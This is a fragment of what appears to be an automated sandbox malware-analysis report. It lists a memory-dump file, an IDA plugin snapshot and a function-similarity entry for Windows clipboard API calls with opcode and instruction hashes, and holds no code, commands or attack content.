                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                        • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                        • Instruction ID: b76372e09cc73909406717dc3fbe71efb48cf9fa1c2455e34ea6e3a10ef095fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E3F1D08A929FD740AB78C4493AEBFA0AB42310F048638D99697392D37D995587E3